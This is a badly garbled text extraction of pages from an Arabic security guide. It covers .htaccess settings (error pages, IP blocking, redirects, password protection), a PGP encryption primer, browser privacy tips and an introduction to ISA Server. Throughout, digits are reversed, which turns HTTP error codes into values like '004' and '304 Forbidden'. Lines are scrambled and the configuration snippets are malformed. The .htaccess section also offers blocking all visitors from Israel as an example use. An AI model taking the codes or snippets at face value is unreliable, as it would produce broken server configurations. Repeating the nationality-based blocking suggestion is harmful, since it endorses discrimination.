-‬تصمیم صفحات ال ‪ error‬اول‪                                                                   ‬‬ ‫ب‪ -‬تحمیل الصفحات على الموقع‪                                                                   ‬‬ ‫ج‪ -‬اضافه السطر التابي في الملف ‪                                                       htaccess.‬‬ ‫‪ ErrorDocument error_num directory_file‬‬ ‫بخیث یكون ‪ error_num‬هو رقم الخطا " الرقام موجود بالسفل " و ‪ directory_file‬هو مكان‪   ‬‬ ‫صفحه ال ‪ error‬التي‪                                                                              ‬‬ ‫قمت بتصمیمها ‪                                                                                   .‬‬ ‫مثال ‪                                                                                              :‬‬ ‫‪ ErrorDocument 404 /errors/nfound.html‬‬ ‫ال ‪ errors‬و ارقامها ‪                                                                           - :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                           ‬‬ ‫‪                                                                            | 004 | Bad Syntax‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                           ‬‬ ‫‪                                                                          | 104 | Unauthorized‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                           ‬‬ ‫‪                                                                               | 204 | Not Used‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                           ‬‬ ‫‪                                                 402‬‬ ‫‪                                                                             | 304 | Forbidden‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                          ‬‬ ‫‪                                                                            | 404 | Not Found‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                          ‬‬ ‫* منع عرض محتویات المجلد الذي ل یوجد به ‪                                             index‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                 ‬‬ ‫بعض المواقع عند محاولة فتح اي دلیل علیها و ل یكون به ملف ‪ index‬یقوم الموقع بسرد جمیع‪     ‬‬ ‫محتویات هذا الدلیل‪                                                                               ‬‬ ‫و لحل هذه المشكله توجد طریقتین ‪                                                              -:‬‬ ‫أ‪ -‬وضع ملف ‪ index‬في كل المجلدات " و بالطبع هذا صعب جدا "‪                                ‬‬ ‫ب‪ -‬باستخدام الملف ‪ htaccess.‬عن طریق اضافه السطر التالي في الملف ‪                       -:‬‬ ‫‪               Options ­Indexes‬‬ ‫* منع‪/‬اتاحة دخول الموقع لشخاص معینة‪                                                         ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                           ‬‬ ‫یمكنك باستخدام الملف ‪  htaccess.‬منع شخص معین من دخول الموقع بعد معرفة الي بي الخاصه به‬ ‫و یمكنك التسفاده‪                                                                                 ‬‬ ‫من ذلك حیث یمكنك منع دخل الموقع لمن ل ترید كما یمكنك منع دخول الموقع لي شخص في‪       ‬‬ ‫اسرائیل مثل ‪                                                                                   ..‬‬ ‫و یمكنك ذلك عن طریق اضافة السطر التالي في الملف ‪                                         - :‬‬ ‫‪           ???.???.???.??? deny from‬‬ ‫حیث ان ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به ‪                                                 .‬‬ ‫واذا اردت منع اي احد من دخول الموقع یمكنك اضافة السطر التالي ‪                             -:‬‬ ‫‪                 deny from all‬‬ ‫واذا اردت السماح لشخص معین بدخول الموقع یمكنك ذلك باضافة السطر التالي ‪                 -:‬‬ ‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪             allow from‬‬ ‫حیث انا ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به‪                                                   ‬‬ ‫* تحویل من یحاول فتح لینك للینك اخر‪                                                            ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                           ‬‬ ‫وتسمى هذه العملیه ب ‪ Redirection‬وهي من اهم فوائد ‪ htaccess.‬الملف تستخدم مثل عند تغیر‪   ‬‬ ‫موقع ملف قدیم‪                                                                                    ‬‬ ‫‪                                               502‬‬ ‫على الموقع الى مكان جدید فیمكنك باستخدام الملف ‪ htaccess.‬عند محاولة احد فتح احد الینك‬ ‫القدیم‬ ‫توجیه‪                                                                                          ‬‬ ‫الى الینك الجدید عن طریق اضافة السطر التالي في الملف ‪                                      -:‬‬ ‫‪                              ???.???/ ???.???/Redirect /somewhere‬‬ ‫‪                                                       http://www.site.com/newlocation‬‬ ‫بحیث یكون ‪ ???.???/somewhere/‬هو مكان الملف القدیم و‪                                    ‬‬ ‫‪ ???.???/http://www.site.com/newlocation‬هو مكان‪                                    ‬‬ ‫الملف الجدید‪                                                                                  .‬‬ ‫­­­­­­­­­­‪                                                                                     ‬‬ ‫* عمل الملف ‪                                                                     .htpasswd‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­‪                                                                       ‬‬ ‫ویمكنك تقوم بعمله بنفس طریقة الملف ‪  , htaccess.‬و سوف نعمله تى نسطیع استخدام الملف‪       ‬‬


‫‪                                                                                    .htaccess‬‬ ‫في الحمایة و سوف نكتب في الملف ‪ htpasswd‬ما یأتي ‪                                       -:‬‬ ‫‪            1user1:EncryptedPwd‬‬ ‫‪                  2user2:EncryptedPwd‬‬ ‫‪ o‬حیث ان ‪2 user1 , user‬هو اسم المستخدم ‪                                                   .‬‬ ‫‪ o‬و ‪2 EncryptedPwd1 , EncryptedPwd‬هي كلمات السر ولكن مشفره و یمكنك تشفیر اي‪  ‬‬ ‫كلمة تریدها‪                                                                                    ‬‬ ‫عن طریق الموقع‪                                                                             ‬‬ ‫‪  http://www.euronet.nl/~arnow/htpasswd‬‬ ‫او‪                                                                                             ‬‬ ‫‪ http://www.e2.u­net.com/htaccess/make.htm‬‬ ‫فمثل لو اردنا وضع یوسر باسم ‪ Security‬و كلمة السر الخاصة به هي ‪3 fu93hds‬نذهب اول الى‬ ‫الموقع‪                                                                                         ‬‬ ‫‪  http://www.euronet.nl/~arnow/htpasswd‬‬ ‫‪ o‬و ‪                                                                   username : Security‬‬ ‫‪ o‬و ‪                                        3passwrod & re­enter password : fu93hds‬‬ ‫‪ o‬و نضغط على الزر ‪ claculate‬لتظهر النتیجه ‪           Security:893bNicBcwszw >--‬‬ ‫و الن قد اتممنا عمل الملف ‪  htaccess.‬و الذي قمنا بعمله و ذلك لكي نستطیع استخدام الملف‪       ‬‬ ‫‪                                                                                    .htaccess‬‬ ‫للحمایة بكلمة سر و یوسر ‪                                                                     .‬‬ ‫‪                                              602‬‬ ‫* الحمایة بواسطه ‪                                                                   htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                                   ‬‬ ‫و تعتبر الفائدة الرئیسیة للملف حیث انه یمكن منع اي احد من دخول دلیل معین في الموقع ال اذا‪ ‬‬ ‫كان‬ ‫معه‪                                                                                            ‬‬ ‫كلمة السر و الیوسر نیم ‪ ,‬فیمنكنك عن طریقها عمل منتدى خاص او اي شئ ترید‪                   .‬‬ ‫فعند وضع الملف ‪  htaccess.‬في اي دلیل و حاول احد دخول هذا الدلیل او اي جزء یندرج تحته‪     ‬‬ ‫سوف یطلب منه‪                                                                                 ‬‬ ‫كلمة سر و یوسر ‪                                                                              .‬‬ ‫و یمكنك عمل ذلك عن طریق اضافة ما یأتي في الملف قبل نسخه في الدلیل المراد‪        ‬‬ ‫حمایته ‪--:‬‬ ‫‪    AuthUserFile /somewhere/.htpasswd‬‬ ‫‪" AuthName "Enter your user and passed please‬‬ ‫‪                Require valid­user‬‬ ‫‪                AuthType Basic‬‬ ‫‪            ><Limit GET POST‬‬ ‫‪                 require valid­user‬‬ ‫‪                    >/<Limit‬‬ ‫‪ o‬بحیث یكون ‪ /somewhere/.htpasswd‬هو مكان ملف ‪ htpasswd.‬على موقعك‪                ‬‬ ‫‪ o‬و یكون ‪ Enter your user and passed please‬هي الرساله التي سوف تظهر لتطلب كلمة‪    ‬‬ ‫السر‪                                                                                           ‬‬ ‫* منع اظهار الملف ‪                                                                  htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                                  ‬‬ ‫قد عرفنا الن ان لهذا الملف اهمیه كبیره فیجب علینا ان نحمیه جیدا ‪ ,‬فالبرغم من ان الملف‬ ‫مخفي ال‬ ‫انه غیر سالم من ان یكون السرفر نفسه غیر مؤمن او انه هناك تصریح خطأ ‪                      ..‬‬ ‫لذلك سوف نمنع عرض هذا الملف عن طریق اضافة ما یأتي ‪                                     - :‬‬ ‫‪                 ><Files .htaccess‬‬ ‫‪                 order allow,deny‬‬


‫‪                  deny from all‬‬ ‫‪                     >/<Files‬‬ ‫‪                                          . error‬‬ ‫‪.‬‬ ‫فاذا حاول احد عرض الملف سوف یظهر له ‪304‬‬ ‫‪                                                 702‬‬ ‫اخر‪                                                           ‬‬ ‫* جعل الصفحات تظهر بامتداد ر‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                              ‬‬ ‫ویمكن باستخدام هذه الخاصیة عمل ملف یظهر كأن امتداده ‪ html.‬و لكنه ذو امتداد ‪ txt.‬مثل ‪    .‬‬ ‫‪                                                                       -:‬‬ ‫باضاف السطر التالي ‪-‬‬ ‫‪          AddType text/plain html‬‬ ‫‪                                  -:‬‬ ‫ویمكنك رؤیة كافى التغیرات التي یمكنك عملها في هذا الملف ‪-‬‬ ‫‪http://www.pharaonics.net/books/MIME.txt‬‬ ‫‪                                             802‬‬ ‫التشفیر‪                          ‬‬ ‫ر‬ ‫أساسیات‬ ‫الــ<>ــد<>ــر‪                                                  ‬‬ ‫ر‬ ‫للكاتب‪:‬‬ ‫‪      PGP‬‬ ‫‪P‬‬ ‫انشاء االله بھذ الموضوع راح أوضح لكم كل شي عن التشفیر وماھي‬ ‫؟!‪                                                           ‬‬ ‫وكیف تعمل !‬ ‫التشفیر‪               ‬‬ ‫ر‬ ‫وھ ذا الموضوع بكتبه بعد عدة قراءات قمت بھا عن علم‬ ‫‪                   etc‬‬ ‫والطرق الي يقدر الشخص انه يقرى ملفاتك المشفرة‪e .‬‬ ‫‪             Paranoid‬‬ ‫‪P‬‬ ‫كل ‪ Hacker‬أو ‪ Paranoid‬وأظن الخ ‪ / DJ King‬تكلم عن‬ ‫ع‪       ‬‬ ‫والي اقوله ان كل شخص مثل ‪:Hacker‬يھتم بالتشفیر ويستخدمه لیمنع‬ ‫الخرين أو أي شخص كان من قراءة ملفاته وانشاء االله ابسط الفكرة في كیفیة‬ ‫ة‬ ‫‪                                                        ...‬‬ ‫كسر التشفیر ‪.‬‬ ‫!!‪                                                   ‬‬ ‫التشفیر وكیف يعمل !‬ ‫انك‪   ‬‬ ‫طبعا التشفیر كان يستخدم قديما والحین نشاھده في كل مكان لنفرض ك‬ ‫او‪   ‬‬ ‫شفت مثل فلم تجسس راح تلقي جھاز كومبیوتر اكید مع ملفات مشفرة و‬ ‫ه‪   ‬‬ ‫فلم عن ‪ Hackers‬راح تلقي بعد مايقضبون على المخترق ويوشوفون جھازه‬ ‫لیس‪ ‬‬ ‫يلقون اغلب الملفات مشفرة وھذا مايحدث الن وھو على وجه الواقعیة س‬ ‫الفلم!‪                                                        ‬‬ ‫!‬ ‫فقط في‬ ‫لما يكون عندك ملف ‪ txt.‬تقدر تقراه يطلقون علیه مصطلح ‪ Plain text‬يعني نص‬ ‫ص‬ ‫قابل‪    ‬‬ ‫صافي او عادي لكن لما تستخدم التشفیر وتشفر الملف راح يصیر غیر ل‬ ‫ل‪  ‬‬ ‫للقراءة وھذا يطلق علیه مصطلح ‪ Cipher text‬يعني النص المشفر الغیر قابل‬ ‫للقراءة‪                                                                 ...‬‬ ‫‪.‬‬ ‫مثال‪                                                               :‬‬ ‫‪:‬‬ ‫وھذا‬ ‫‪Plain text ==>Encryption==>Ciphertext==>Descryption==>Plaintext‬‬ ‫حیث‪                  :‬‬ ‫‪:‬‬ ‫المثال ھ ذا يوضح لما تشفر ملف وتفكه من التشفیر ‪/‬‬ ‫ي‪                                                ‬‬ ‫= ‪Plain text‬النص العادي‬ ‫ص‪                                              ‬‬ ‫= ‪Encryption‬تشفیر النص‬ ‫ر‪                                                ‬‬ ‫= ‪Cipher text‬نص مشفر‬ ‫ر‪                                   ‬‬ ‫= ‪Descryption‬فك تشفیر النص المشفر‬ ‫ي‪                                   ‬‬ ‫= ‪Plain text‬عودة الملف إلى نص عادي‬ ‫‪                                    902‬‬ ‫‪                                                     PGP‬‬ ‫‪P‬‬ ‫علم التشفیر و @‪....‬‬ ‫ذا‪  ‬‬ ‫علم التشفیر ھو علم يستخدم الرياضیات لتشفیر وفك تشفیر البیانات ‪ .‬ھ ا‬ ‫العلم يفیدك في إنك تجعل من ملفاتك آمنة حتى مع شبكة النترنت الغیر آمنة‬ ‫ة‬ ‫‪                                                                            .‬‬ ‫منه‪   .‬‬ ‫‪.‬‬ ‫علم التشفیر احیانا يكون قوي او ضعیف ‪ .‬وأكید حنا نحتاج لتعلم القوي‬ ‫‪                          PGP (Pretty Goog Privacy) Encryption Program‬‬ ‫إن ‪ PGP‬ھ و أفضل برنامج تشفیر لتشفیر ملفاتك وھو يعمل بھذه الطريقة‪      ::‬‬ ‫د‪ ‬‬ ‫عندما تشفر ملف ما بواسطة ‪ PGP‬تعمل ‪ PGP‬على ضغط الملف وھذا يساعد‬ ‫م‪            ‬‬ ‫مساحة القرص يعني يفیدك في أمرين ‪ -1‬التشفیر ‪ -2‬تقلیل الحجم‬


‫يعمل‪ ‬‬ ‫ل‬ ‫وھي تنشأ مايعرف بالـ ‪Session Key‬أي مفتاح جلسة ھذا ‪Session Key‬‬ ‫الملف‪          .‬‬ ‫‪.‬‬ ‫بشكل آمن جدا وذو شفرة قاعدة أو (لوغاريتم) خاصة لتشفیر‬ ‫‪    password‬‬ ‫‪p‬‬ ‫‪PGP‬يسألك عن) ‪ pass phrase‬العبارة التي وضعتھا) ولیس عن‬ ‫استخراج‪      ‬‬ ‫ج‬ ‫وھذا أكثر أمان ضد المھ اجمین الذين يستخدمون القوامیس في‬ ‫الباسوورد ‪ .‬عندما يقوم الشخص باستخدام جمیع الحروف في قاموس للحصول‬ ‫ل‬ ‫‪                                                              Password‬‬ ‫‪P‬‬ ‫على‬ ‫ة‪     ‬‬ ‫ولما تستخدم ‪ pass phrase‬يمكن ان تدخل عبارة بالكامل بالحروف الكبیرة‬ ‫‪                                          ....‬‬ ‫والصغیر وايضا العداد من ‪ 0‬إلى ‪. 9‬‬ ‫الطرق لكسر التشفیر ‪                                                       ::‬‬ ‫ل‪ ‬‬ ‫أكید إن ‪ PGP‬تم كتابتھا بواسطة أشخاص الي يبغون ملفاتھم مشفرة من قبل‬ ‫التامة‪                            .‬‬ ‫‪.‬‬ ‫أشخاص أخرى ويريدون الخصوصیة والسرية‬ ‫لما ترسل ‪ E ­ mail‬يمكن قرائته من قبل أشخاص كثیرون دون علمك لكن لماا‪ ‬‬ ‫تستخدم ‪ PGP‬فقط الشخص للذي الرسالة الخاصة به يقرأھا‪                 ..‬‬ ‫ن‪ ‬‬ ‫ألحین إنت تعلمت أھم الشیاء حول ‪ PGP‬والتشفیر أيضا تريد أن تعرف إذا كان‬ ‫ل!!‪                               ‬‬ ‫بالمكان من كسر ھذا النوع من التشفیر أم !‬ ‫رسالة‪ ‬‬ ‫ة‬ ‫في الحقیقة لو استخدمت جمیع الجھزة الموجودة بالعالم لفك تشفیر‬ ‫ك‪  ‬‬ ‫‪PGP‬صغیرة يبغالھا ‪ 21‬ملیون مرة ھھھھھھھھھھھھھھھھھخخخخ يعني املك‬ ‫‪ 1%‬ھذا مايمیز التشفیر من نوع ‪ PGP‬لھ ذا يعد أفضل النواع ولأحد يقدرر‪       ‬‬ ‫يكسره‪                                                                      .‬‬ ‫‪.‬‬ ‫‪                                      012‬‬ ‫‪                                              PASS PHRASE‬‬ ‫‪P‬‬ ‫عبارة التصريح ‪...‬‬ ‫ت‪          ‬‬ ‫أكید إن نوع التشفیر ‪ PGP‬قوي جدا لكن ھل من الممكن فتح الملفات‬ ‫؟!‪                                                         ‬‬ ‫المشفرة بواسطته !‬ ‫ي‪  ‬‬ ‫بشرط واحد إذا كان الشخص غبي لدرجة أن يضع جمیلة التصريح والتي ھي‬ ‫‪pass phrase‬عبارة سھلة نوعا ماا‪                                             ‬‬ ‫مثل ‪ 987654321 :‬أو ‪ 654321‬أو اسمه الشخصي وھكذا‪                   ....‬‬ ‫تشفیر‪ ‬‬ ‫ر‬ ‫أو أن يقوم بتخزينھ ا في ملف نصي واكید اذا احد وصل الملف يقدر يفك‬ ‫الملفات بسھولة وطبعا كل ماكانت عبارة ‪ pass‬طويلة كل ماكان صعب جداا‪     ‬‬ ‫ا‪                                                                 .‬‬ ‫العثور علیھ ‪.‬‬ ‫ه‪      ‬‬ ‫وبعضھ م يحاول استخدام تقنیة ‪ Brute­Forcing‬ليجاد الباسوورد حتى انه‬ ‫ممكن يغیر القاموس الخاص بالـ ‪Brute‬ويضع فیه العديد من الكلمات العشوائیة!!‬ ‫كذا‪                                :‬‬ ‫‪:‬‬ ‫حاول تخلي العبارة الخاصة فیك اصعب من‬ ‫‪                          555 HeYiWiLl454254hhfFFfFuFdghdHGdGDgdgH‬‬ ‫حتى‪  ‬‬ ‫والمفروض تتأكد من إنك تضع عبارة صعبة جدا ذات حروف كبیرة وصغیرة ى‬ ‫المشفر‪                                  .‬‬ ‫‪.‬‬ ‫تضمن عدم التفكیر في كسر الملف‬ ‫لتقم بحذف ملفات ‪ TXT‬بعد استخدام التشفیر!! ؟‪                            ‬‬ ‫ولكن‪  ‬‬ ‫ن‬ ‫أكید لما تنتھو من تشفیر الملفات بواسطة ‪ PGP‬لزم تحذف ملفات ‪TXT‬‬ ‫استخدامه‪  ‬‬ ‫ه‬ ‫في الحقیقة الملفات لتنحذف وبإمكان أي شخص إرجاعھ ا بمجرد‬ ‫برنامج ‪ Disk Recovery‬حتى لو كتبت الجملة بواسطة المحرر الدفتر لن ينحذف‬ ‫ف‬ ‫ة‪       ‬‬ ‫ملف ‪ txt‬لبد من وجوده في مكان ما في جھازك لذلك ھنالك أداة خاصة‬ ‫تسمى‪                                                               ‬‬ ‫ى‬ ‫بالـ ‪PGP‬‬ ‫‪                                                           PGP Secure Wipe‬‬ ‫ھ ذي الداة البسیطة تكمل عملیات حذف الملفات المحذوفة من جھازك وھكذاا‬ ‫المشفر‪                                         .‬‬ ‫‪.‬‬ ‫سوف يصلح فقط لديك الملف‬ ‫‪                                                     Trojan & Virus‬‬ ‫‪T‬‬ ‫ماعلقة !‬ ‫ل‪    ‬‬ ‫علقة وثیقة فاحذر ان يحتوي جھازك على ‪ Key logger‬فھو يقوم بحفظ كل‬ ‫يقوم‪  ‬‬ ‫م‬ ‫ماكتب على لوحة المفاتیح وإرسالھا للمھاجم او المخترق وبذلك سوف‬ ‫السرية!!‪                                                       ‬‬ ‫!‬ ‫بمعرف العبارة‬ ‫العبارات‪           ‬‬ ‫ت‬ ‫وأيضا ھنالك فیروسات خاصة صممت لتسرق ھذا النوع من‬ ‫‪                                      112‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫وألحین أقولكم إن التشفیر بواسطة ‪ PGP‬يعتبر آمن لبعد الحدود وليمكن‪       ‬‬ ‫كسره إل إذا كان المستخدم ليؤمن علیه او يضع عبارات سھلة جدا او يحتوي‪  ‬‬ ‫جھ ازه على فیروس وتروجان او مفتاح التسجیل‪                                ...‬‬ ‫لذلك إذا أمنت نفسك جیدا لن وليوجد أي شخص يستطیع كسر ھذا التشفیر‪ ‬‬ ‫‪                                                               >­­­))............ PGP‬‬ ‫‪                     http://www.pgpi.org/products/pgp/versions/freeware‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪                                         212‬‬ ‫ماذا تعرف المواقع التى تزوره عنك؟‪                      ‬‬ ‫عندما تتجول في حواري إنترنت‪                                                           ،‬‬ ‫ص بك‪               ،‬‬ ‫تترك أثار أقدامك في كل مكان تزوره‪ .‬فالموقع الذي تمر به‪ ،‬یفتح سج ً خا ً‬ ‫ل‪                   ‬‬ ‫ا‬ ‫یتضمن عنوان الموقع الذي جئت منه‪ ،‬نوع الكمبیوتر والمتصفح الذي تستخدمه‪ ،‬وعنوان رقم البي‬ ‫الدائم‪ ،‬أو المتغیر‪ ،‬للكمبیوتر الذي تتصل منه‪ .‬ویمكن تحت ظروف معینة‪ ،‬أن یتمكن‪              ‬‬ ‫الموقع من الحصول على عنوان بریدك اللكتروني‪ ،‬واسمك الحقیقي‪ .‬ویقول بعض الخبراء‪      ،‬‬ ‫أنه یمكن باستخدام بریمجات جافا‪ ،‬أو جافا سیكریب‪ ،‬أو أكتیف إكس‪ ،‬سرقة عنوان بریدك‪        ‬‬ ‫اللكتروني‪ ،‬وبعض المعلومات الخرى عنك‪ ،‬على الرغم من أن هذا العمل غیر قانوني‪          ‬‬ ‫تستطیع شل عمل جافا في إكسبلورر ‪ ،.2.3‬من خلل الوامر‪                                  ‬‬ ‫‪                                                                                  View‬‬ ‫ثم‪                                                                                       ‬‬ ‫‪                                                                               Options‬‬ ‫ثم‪                                                                                       ‬‬ ‫‪                                                                           ،Advanced‬‬ ‫وإزالة علمتي الختیار من مربعي‪                                                          ‬‬ ‫وفي نافیجیتور ‪ 0.3‬من خلل الوامر‪                                                        ‬‬ ‫‪                                                            Enable Java JIT compiler‬‬ ‫‪                                                                .enable Java Logging‬‬ ‫‪                                                                              .Options‬‬ ‫ثم‪                                                                                       ‬‬ ‫‪                                                                Network Preferences‬‬ ‫ثم‪                                                                                       ‬‬ ‫‪                                         312‬‬ ‫‪                                                                              Languages‬‬ ‫وإزالة علمتي الختیار من مربعي‪                                                           ‬‬ ‫‪ ،Enable Java‬و‪                                                    enable JavaScript‬‬ ‫أسهل طریقة لمعرفة ما تسجله المواقع التي تزورها عنك‪ ،‬عادة‪ ،‬هي التوجه إلى موقع‪          ‬‬ ‫‪                                                        )(www.consumer.net/analyze‬‬ ‫والنتظار قلی ً‪ ،‬قبل أن یكتشف هذا الموقع المعلومات‪ ،‬ویعرضها أمامك على الشاشة‪          .‬‬ ‫ل‪                                                                             ‬‬ ‫وتقدم أنت‪ ،‬معلوماتك الشخصیة‪ ،‬عندما تمل قسیمة الشتراك في خدمات أحد المواقع‪          .‬‬ ‫وننصحك في هذه الحالة‪ ،‬بالتأكد أو ً‬ ‫ل‪ ،‬من أن هذا الموقع "محترم"‪ ،‬ولن یسرب هذه‪            ‬‬ ‫المعلومات إلى جهات أخرى‪ ،‬قبل أن تقدم له هذه المعلومات‪                                  ..‬‬ ‫ف صغیًر على القرص الصلب لكمبیوترك‪ ،‬یسمى‪   ‬‬ ‫تضع معظم مواقع ویب‪ ،‬عندما تزورها‪ ،‬مل ً‬ ‫ا‪                                          ‬‬ ‫ا‬ ‫"كوكي"‪                                                                                    ‬‬ ‫‪                                                                                )(Cookie‬‬ ‫ن‪ ،‬خاصة إذا كان الموقع یتطلب منك‪        ‬‬ ‫بهدف جمع بعض المعلومات عنك‪ ،‬وهو مفید أحیا ً‬ ‫ا‪                                            ‬‬ ‫إدخال كلمة مرور تخولك بزیارته‪ .‬ففي هذه الحالة لن تضطر في كل زیارة لدخال تلك‪        ‬‬


‫قرصك‪   ‬‬ ‫ك‬ ‫الكلمة‪ ،‬إذ سیتمكن الموقع من اكتشافها بنفسه عن طریق "الكوكي"‪ ،‬الذي وضعه على‬ ‫اا‪                   ‬‬ ‫ً‬ ‫ك‪                   ‬‬ ‫الصلب‪ ،‬في الزیارة الولى‪ .‬لكن‪ ،‬یرى الكثیر من المستخدمین في ذلك انتهاك‬ ‫كنت‪   ‬‬ ‫لخصوصیاتهم أثناء التصفح‪ ،‬خاصة عندما یراقب "الكوكي" تحركاتك ضمن الموقع‪ .‬إذا ت‬ ‫ل ترغب أن یسجل الخرون "كوكیز" على قرصك الصلب‪ ،‬بهدف جمع بعض المعلومات عنك‪،،‬‬ ‫"كوكي"‪    ،‬‬ ‫‪،‬‬ ‫فبإمكانك تجهیز المتصفح الذي تستخدمه‪ ،‬بحیث یطلب موافقتك‪ ،‬قبل أن یحفظ أي‬ ‫‪ .(Accepting a Cookie‬‬ ‫‪.‬‬ ‫على قرصك الصلب ‪ ،Options‬ثم ‪ ،Network Preferences‬ثم‬ ‫والفضل‪                                                                                    ‬‬ ‫ل‬ ‫مثل‪                                                                      ‬‬ ‫أن تستخدم برامج‪ ،‬ل‬ ‫بناء‪           ‬‬ ‫تحلل رموز الكوكي‪ ،‬وتعلمك ما إذا كان مفید ً أم ل‪ ،‬ثم نصحك بقبوله أو حذفه‪ ، ،‬ء‬ ‫اا‪                                                 ‬‬ ‫التحلیل‪                                                                           .‬‬ ‫‪.‬‬ ‫على ذلك‬ ‫تدخل‪       ‬‬ ‫ل‬ ‫تتمثل أكبر المخاطر التي قد تواجهها‪ ،‬في ما تكتبه ضمن المجموعات الخباریة إذ‬ ‫‪                                          .(www.dejanews.com‬‬ ‫‪.‬‬ ‫رسائلك ضمن أرشیف (‬ ‫‪ ،‬حیث یمكن لي شخص الطلع علیها‪ ،‬الن‪ ،‬وربما بعد ‪ 02‬سنة‪ ،‬أیض ً‪ .‬قد تشارك‪         ..،‬‬ ‫اا‪                       ‬‬ ‫‪                                         412‬‬ ‫طائشة‪  ،‬‬ ‫‪،‬‬ ‫ب في بعض المجموعات الخباریة غیر المناسبة‪ ،‬وتكتب آرا ً‬ ‫عندما تكون شا ً‬ ‫اا‪            ‬‬ ‫ء‬ ‫أو‪  ‬‬ ‫لكن‪ ،‬علیك أن تعلم أن ما خطته یداك‪ ،‬قد یبقى إلى البد‪ ،‬وربما یطلع علیه أحفادك‪ ،‬و‬ ‫تنسى!‪                    .‬‬ ‫‪.‬‬ ‫م كسلح ضدك‪ ،‬فإنترنت ل‬ ‫جهات أخرى! وقد یستخدم یو ً‬ ‫اا‪                                                       ‬‬ ‫متعارضان‪            ‬‬ ‫ن‬ ‫أما ما تكتبه ضمن منتدیات الحوار والدردشة العربیة‪ ،‬فله وجهان‬ ‫إن‪   ‬‬ ‫الول‪ ،‬هو أن معظم هذه المنتدیات‪ ،‬ل تحتفظ بما یكتب فیها لفترات طویلة‪ .‬وحتى ن‬ ‫احتفظت بها وأرشفتها‪ ،‬فإن معظمها ل یوفر أدوات بحث فعالة للتنقیب ضمن الرشیف‪،،‬‬ ‫أقل‪                                .‬‬ ‫‪.‬‬ ‫وهذا یعني أن احتمال اكتشافها على المدى البعید‬ ‫قانونیة‪     ‬‬ ‫ة‬ ‫الوجه الثاني‪ ،‬هو أن الرقابة في المجتمعات العربیة أكبر‪ .‬فلو طلبت أي جهة‬ ‫من المنتدى ومزود خدمات إنترنت‪ ،‬الكشف عن كاتب إحدى الرسائل‪ ،‬أو المشاركین في‬ ‫ي‬ ‫د‪ .‬وسوف ُعرف كاتبه‪،،‬‬ ‫الدردشة‪ ،‬فسوف یتم ذلك بسهولة‪ ،‬إذا كان ما كتبه ل زال موجو ً‬ ‫اا‪              ‬‬ ‫ی‬ ‫زائفین‪                                     .‬‬ ‫‪.‬‬ ‫ی‬ ‫برید‬ ‫ن‬ ‫وعنوا‬ ‫م‬ ‫ً‬ ‫حتى إن كان یستخدم اس ً‬ ‫ً‬ ‫اا‪                                             ‬‬ ‫ا‬ ‫ا‬ ‫‪                                512‬‬ ‫ة‪ ‬‬ ‫شرح وظیفة ‪ Isa‬لحل كثیر من المشاكل المنیة على الشبكة‬ ‫الشمالى‪                                                          ‬‬ ‫ى‬ ‫للكاتب‪:‬‬ ‫الشبكات‪  ‬‬ ‫ت‬ ‫مع زيادة إستخدام شبكة النترنت في الشبكات المحلیة سواء لربط‬ ‫حماية‪   ‬‬ ‫ة‬ ‫الفرعیة أو وصول الزبائن أو نشر التطبیقات ‪ ،‬كان لبد من وجود برنامج‬ ‫متكامل يمنع كل الخطار المحتملة من النترنت ‪                            ،،‬‬ ‫ج‪  ‬‬ ‫وبرنامج ‪ Microsoft Internet Security and Acceleration ISA‬ھو من البرامج‬ ‫المنیة‪    ‬‬ ‫ة‬ ‫المثالیة لذالك ‪ ،‬فھ و يقدم ادوات وقدرة كبیرة لحل كثیر من المشاكل‬ ‫على الشبكة وتحكم شبه كامل بكل منافذ الدخول والخروج من الشبكة ‪      ،،‬‬ ‫سريعة‪ ‬‬ ‫ة‬ ‫وبلضافة لذالك فھو يعمل كبروكسي للشبكة لوصلھ ا بالنترنت بطريقة‬ ‫بطريقة‪      ‬‬ ‫ة‬ ‫حیث يمثل مصدر للطلبات لكل زبائن الشبكة حیث يعرض الطلبات‬ ‫الوصول‪        ‬‬ ‫ل‬ ‫دينمیكیة من ذاكرة الخادم بدل النترنت ‪ ،‬ويكون بذاك اسرع من‬ ‫مباشرة‪                                                     ‬‬ ‫ة‬ ‫للنترنت بصورة‬ ‫ة‪ ‬‬ ‫خادم ‪ Microsoft Internet Security and Acceleration ISA‬يعطي قیمة كبیرة‬ ‫للشبكة وقدرة على التحكم لمن يطمعون في الوصول إلى نتائج أمن مرضیة ‪ ،،‬‬ ‫فرع‪    ‬‬ ‫فھ و برنامج يعمل على كل الحجوم من الشبكات ‪ ،‬شبكة مكتب صغیر ‪ ،‬ع‬ ‫شركة ‪ ،‬مواقع تجارة الكترونیة ‪ ،‬مز ّدو خدمات النترن ِ (مز ّدو خدمة النترنت))‬ ‫وو‪                  ‬‬ ‫و ت‬


